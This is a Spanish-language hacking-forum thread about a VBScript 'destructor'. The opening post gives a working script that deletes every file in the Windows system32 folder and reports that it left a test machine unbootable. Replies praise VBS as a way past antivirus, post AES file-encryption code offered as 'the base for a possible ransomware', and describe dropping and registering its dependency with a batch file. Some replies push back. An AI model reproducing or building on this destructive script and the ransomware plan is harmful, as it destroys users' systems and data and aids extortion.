comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[VBS] Destructor

  • 13 Respuestas
  • 3923 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 370
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« en: Noviembre 09, 2016, 09:26:59 am »
Hola chicos, se que es un script MUY basico. Pero lo probe en windowsXP service pack 3 x86 y funciono.
Es parte de un pack simple de herramientas de Fabian Portantier, profesor de la carrera de Seguridad Informatica en EducacionIT.


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
On Error Resume Next

'Desarrollado por Fabian Portantier'

strDir = "C:\WINDOWS\system32\"

Mensaje = "Este programa es una prueba de concepto, que demuestra como algunos archivos " &_
"no son detectados por los antivirus, aun cuando lo unico que hacen es eliminar componentes de sistema." &_
"Esta seguro de que desea ejecutar este programa?"

retval = msgbox(Mensaje, vbYesNo, "Cuidado!")
if retval = vbYes then
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(strDir)
Set fc = f.Files
For Each f1 in fc
fso.DeleteFile f1, True
Next
end if


Es re basico, pero que opinan? ..
Pikaa~


Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #1 en: Noviembre 09, 2016, 10:53:30 am »
HOLA!!!

Creo que es justamente eso, un PoC , como siempre defendi, VBS es un lenguaje olvidado por los AVs, es muy buen vector de entrada.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 370
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #2 en: Noviembre 09, 2016, 11:13:11 am »
El tema es que funciona a la perfeccion. Despues de ejecutar el script, intento realizar acciones como por ejemplo ir al panel de control y hay pocos ajustes.




Por si no se lee bien la imagen.
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
No se ha iniciado Windows porque el siguiente archivo falta
o esta dañado:
<windows root>\system32\hal.dll.
Reinstale una copia del archivo mencionado.

Tendra solución simple eso? .. Si hubiera traído el HIREN's probaba solucionarlo a ver como lo haría un usuario.
Pikaa~


Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #3 en: Noviembre 09, 2016, 12:36:14 pm »
HOLA!!!

Si, buscar los archivos eliminados por fuera y volverlos  a colocar en la carpeta, ya que no son archivos escenciales windows no guarda un backup de los mismos, mi recomendacion, una virtual con instalacion limpia del mismo SO, y ahi copiado de archivos faltantes.

Como realizar esta tarea: Copias toda la carpeta system32 de la virtual pegas en la system32 del ordenador dañado y pones que no sobrescriba el destino.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 370
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #4 en: Noviembre 09, 2016, 12:59:48 pm »
A esta muy bueno saber eso, entonces no es TAN asesino ese script. Es para asustar al usuario final y a uno que otro tecnico perezoso.

Muchas gracias Numeritos
Pikaa~


Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #5 en: Noviembre 09, 2016, 01:12:11 pm »
HOLA!!!

Ese script necesecitaria privilegios system para borrar archivos clave.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado sadfud

  • *
  • Moderator
  • Mensajes: 181
  • Actividad:
    0%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #6 en: Noviembre 09, 2016, 01:45:45 pm »
Interesante, pero he de decir que los avs ya se han dado cuenta de que tenian trabajo pendiente con vbs y le estan dando caña, incluido microsoft, que desde hace unos meses con una actualizacion de windows defender  detecta vbs cifrado, detectando las funciones de execute y executeglobal. Lo que es tan bueno de vbs es que al crear scripts, que microsoft reconoce como propios, los antivirus no tienen detecciones heuristicas sobre este tipo de archivos, pero eso ha empezado a dejar de ser asi.
Powershell es el nuevo VBS.

Seria mas interesante si alguien es capaz de implementar una rutina de cifrado en lugar de borrar archivos, seria el primer ransomware en vbs, facil de cifrar, ligero y efectivo.

Un saludo
Mi blog: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Si necesitas ayuda, no dudes en mandar MP

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 370
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #7 en: Noviembre 09, 2016, 02:27:19 pm »
Voy a probar el mismo script, en w7 limpio y actualizado a ver que pasa .. jaja
Powershell es increiblemente potente, y lo de cifrar archivos ... faaaa, es una muy buena idea.

Gracias @No tienes permisos para ver links. Registrate o Entra con tu cuenta y @No tienes permisos para ver links. Registrate o Entra con tu cuenta por lo de los privilegios.
Pikaa~


Desconectado sadfud

  • *
  • Moderator
  • Mensajes: 181
  • Actividad:
    0%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #8 en: Noviembre 09, 2016, 02:49:02 pm »
Ejemplo de funcion de cifrado con AES-256
Código: Visual Basic
  1. Dim fso, outFile
  2. Set fso = CreateObject("Scripting.FileSystemObject")
  3. Set outFile = fso.CreateTextFile("output.txt", True)
  4. set crypt = CreateObject("Chilkat_9_5_0.Crypt2")
  5. success = crypt.UnlockComponent("30-day trial")
  6. crypt.CryptAlgorithm = "aes"
  7. crypt.CipherMode = "cbc"
  8. crypt.KeyLength = 256
  9. crypt.PaddingScheme = 0
  10. ivHex = "000102030405060708090A0B0C0D0E0F"
  11. crypt.SetEncodedIV ivHex,"hex"
  12. keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"
  13. crypt.SetEncodedKey keyHex,"hex"
  14. inFile = "C:\cifrar.pdf"
  15. outFile = "C:\cifrar.pdf.aes"
  16. success = crypt.CkEncryptFile(inFile,outFile)
  17. WScript.Quit
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Esa seria la base para un posible ransomware, quedaria crear un array con la lista de extensiones y meterlo en un for loop e ir cifrando el disco.
La rutina de cifrado no esta detectada como es logico

Mi blog: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Si necesitas ayuda, no dudes en mandar MP

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #9 en: Noviembre 10, 2016, 09:16:40 am »
HOLA!!!

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Ejemplo de funcion de cifrado con AES-256
Código: Visual Basic
  1. Dim fso, outFile
  2. Set fso = CreateObject("Scripting.FileSystemObject")
  3. Set outFile = fso.CreateTextFile("output.txt", True)
  4. set crypt = CreateObject("Chilkat_9_5_0.Crypt2")
  5. success = crypt.UnlockComponent("30-day trial")
  6. crypt.CryptAlgorithm = "aes"
  7. crypt.CipherMode = "cbc"
  8. crypt.KeyLength = 256
  9. crypt.PaddingScheme = 0
  10. ivHex = "000102030405060708090A0B0C0D0E0F"
  11. crypt.SetEncodedIV ivHex,"hex"
  12. keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"
  13. crypt.SetEncodedKey keyHex,"hex"
  14. inFile = "C:\cifrar.pdf"
  15. outFile = "C:\cifrar.pdf.aes"
  16. success = crypt.CkEncryptFile(inFile,outFile)
  17. WScript.Quit
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Esa seria la base para un posible ransomware, quedaria crear un array con la lista de extensiones y meterlo en un for loop e ir cifrando el disco.
La rutina de cifrado no esta detectada como es logico


@SadFud , me extraña   :-\  pensaba que estabas mas capacitado para estos temas, Chilkat es una libreria paga y propietaria que requiere instalacion previa, no es un recurso que se use en malware, siempre aparece en google cuando buscas pero sus ejemplos no sirven y menos si queres hacer malware por que deberias distribuir el vbs (en este caso) con la libreria.

En fin escribo esto para que no piensen que es todo tan simple.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado OnTheCore

  • *
  • Underc0der
  • Mensajes: 58
  • Actividad:
    0%
  • Reputación 1
    • Ver Perfil
« Respuesta #10 en: Noviembre 10, 2016, 02:34:45 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Hola chicos, se que es un script MUY basico. Pero lo probe en windowsXP service pack 3 x86 y funciono.
Es parte de un pack simple de herramientas de Fabian Portantier, profesor de la carrera de Seguridad Informatica en EducacionIT.


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
On Error Resume Next

'Desarrollado por Fabian Portantier'

strDir = "C:\WINDOWS\system32\"

Mensaje = "Este programa es una prueba de concepto, que demuestra como algunos archivos " &_
"no son detectados por los antivirus, aun cuando lo unico que hacen es eliminar componentes de sistema." &_
"Esta seguro de que desea ejecutar este programa?"

retval = msgbox(Mensaje, vbYesNo, "Cuidado!")
if retval = vbYes then
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(strDir)
Set fc = f.Files
For Each f1 in fc
fso.DeleteFile f1, True
Next
end if


Es re basico, pero que opinan? ..
Eso no es malware, solamente borra todos los archivos en System32. Ejecutalo en una cuenta de usuario o en guest y no va a funcionar.
El antivirus es una barrera protectora, no es una herramienta para salvar usuarios estúpidos o malas configuraciones.
Si un script vbs que borra todos los archivos de system32 tiene que ser detectado como virus, un rm -rf también tendría que ser detectado y la herramienta format.exe también, dd también, etc.

Desconectado sadfud

  • *
  • Moderator
  • Mensajes: 181
  • Actividad:
    0%
  • Reputación 9
    • Ver Perfil
    • Blog
  • Skype: SadFud
« Respuesta #11 en: Noviembre 10, 2016, 02:45:34 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
HOLA!!!

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Ejemplo de funcion de cifrado con AES-256
Código: Visual Basic
  1. Dim fso, outFile
  2. Set fso = CreateObject("Scripting.FileSystemObject")
  3. Set outFile = fso.CreateTextFile("output.txt", True)
  4. set crypt = CreateObject("Chilkat_9_5_0.Crypt2")
  5. success = crypt.UnlockComponent("30-day trial")
  6. crypt.CryptAlgorithm = "aes"
  7. crypt.CipherMode = "cbc"
  8. crypt.KeyLength = 256
  9. crypt.PaddingScheme = 0
  10. ivHex = "000102030405060708090A0B0C0D0E0F"
  11. crypt.SetEncodedIV ivHex,"hex"
  12. keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"
  13. crypt.SetEncodedKey keyHex,"hex"
  14. inFile = "C:\cifrar.pdf"
  15. outFile = "C:\cifrar.pdf.aes"
  16. success = crypt.CkEncryptFile(inFile,outFile)
  17. WScript.Quit
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Esa seria la base para un posible ransomware, quedaria crear un array con la lista de extensiones y meterlo en un for loop e ir cifrando el disco.
La rutina de cifrado no esta detectada como es logico


@SadFud , me extraña   :-\  pensaba que estabas mas capacitado para estos temas, Chilkat es una libreria paga y propietaria que requiere instalacion previa, no es un recurso que se use en malware, siempre aparece en google cuando buscas pero sus ejemplos no sirven y menos si queres hacer malware por que deberias distribuir el vbs (en este caso) con la libreria.

En fin escribo esto para que no piensen que es todo tan simple.

GRACIAS POR LEER!!!

Lo se, y lo pense, pero no encontre rutinas de cifrado que no tirasen de esta dependencia, de todos modos puedes bindear todo, droppeas la dependencia en temp y la registras con un bat que tambien dropees y posteriormente ejecutas el vbs. como bien dices es de pago y solo tienes 30 dias de uso por equipo, pero da igual porque en realidad solo vas a llamarla en la primera ejecucion

Seria un malware muy muy cutre, si, pero podria funcionar.

Un saludo
Mi blog: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Si necesitas ayuda, no dudes en mandar MP

Desconectado PikachuDorado

  • *
  • Underc0der
  • Mensajes: 370
  • Actividad:
    0%
  • Reputación 1
  • Im just a Pikachu
    • Ver Perfil
    • Soporte Ava
« Respuesta #12 en: Noviembre 10, 2016, 03:46:19 pm »
No recuerdo de donde saque este codigo, pero si te sirve de algo...


Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
    Public Function AES_Encrypt(ByVal input As String, ByVal pass As String) As String
        Dim AES As New System.Security.Cryptography.RijndaelManaged
        Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
        Dim encrypted As String = ""
        Try
            Dim hash(31) As Byte
            Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
            Array.Copy(temp, 0, hash, 0, 16)
            Array.Copy(temp, 0, hash, 15, 16)
            AES.Key = hash
            AES.Mode = Security.Cryptography.CipherMode.ECB
            Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
            Dim Buffer As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(input)
            encrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
            Return encrypted
        Catch ex As Exception
            Return ex
        End Try
    End Function

    Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
        Dim AES As New System.Security.Cryptography.RijndaelManaged
        Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
        Dim decrypted As String = ""
        Try
            Dim hash(31) As Byte
            Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
            Array.Copy(temp, 0, hash, 0, 16)
            Array.Copy(temp, 0, hash, 15, 16)
            AES.Key = hash
            AES.Mode = Security.Cryptography.CipherMode.ECB
            Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
            Dim Buffer As Byte() = Convert.FromBase64String(input)
            decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
            Return decrypted
        Catch ex As Exception
            Return ex
        End Try
    End Function
End Class


@OnTheCore  si, lo se. No estoy creando la herramienta de la muerte. Estoy mostrando lo que encontre en un pack.
« Última modificación: Noviembre 10, 2016, 03:49:55 pm por PikachuDorado »
Pikaa~


Desconectado fudmario

  • *
  • Cramel
  • *
  • Mensajes: 193
  • Actividad:
    0%
  • Reputación 11
    • Ver Perfil
    • fudmario - GitHub
  • Skype: fudmario
« Respuesta #13 en: Noviembre 10, 2016, 09:06:56 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No recuerdo de donde saque este codigo, pero si te sirve de algo...
Código: vb.net
  1.    Public Function AES_Encrypt(ByVal input As String, ByVal pass As String) As String
  2.         Dim AES As New System.Security.Cryptography.RijndaelManaged
  3.         Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
  4.         Dim encrypted As String = ""
  5.         Try
  6.             Dim hash(31) As Byte
  7.             Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
  8.             Array.Copy(temp, 0, hash, 0, 16)
  9.             Array.Copy(temp, 0, hash, 15, 16)
  10.             AES.Key = hash
  11.             AES.Mode = Security.Cryptography.CipherMode.ECB
  12.             Dim DESEncrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateEncryptor
  13.             Dim Buffer As Byte() = System.Text.ASCIIEncoding.ASCII.GetBytes(input)
  14.             encrypted = Convert.ToBase64String(DESEncrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
  15.             Return encrypted
  16.         Catch ex As Exception
  17.             Return ex
  18.         End Try
  19.     End Function
  20.  
  21.     Public Function AES_Decrypt(ByVal input As String, ByVal pass As String) As String
  22.         Dim AES As New System.Security.Cryptography.RijndaelManaged
  23.         Dim Hash_AES As New System.Security.Cryptography.MD5CryptoServiceProvider
  24.         Dim decrypted As String = ""
  25.         Try
  26.             Dim hash(31) As Byte
  27.             Dim temp As Byte() = Hash_AES.ComputeHash(System.Text.ASCIIEncoding.ASCII.GetBytes(pass))
  28.             Array.Copy(temp, 0, hash, 0, 16)
  29.             Array.Copy(temp, 0, hash, 15, 16)
  30.             AES.Key = hash
  31.             AES.Mode = Security.Cryptography.CipherMode.ECB
  32.             Dim DESDecrypter As System.Security.Cryptography.ICryptoTransform = AES.CreateDecryptor
  33.             Dim Buffer As Byte() = Convert.FromBase64String(input)
  34.             decrypted = System.Text.ASCIIEncoding.ASCII.GetString(DESDecrypter.TransformFinalBlock(Buffer, 0, Buffer.Length))
  35.             Return decrypted
  36.         Catch ex As Exception
  37.             Return ex
  38.         End Try
  39.     End Function
  40. End Class
.....................


Ese Código es para VB.NET, no para VBScript

Saludos.


 

¿Te gustó el post? COMPARTILO!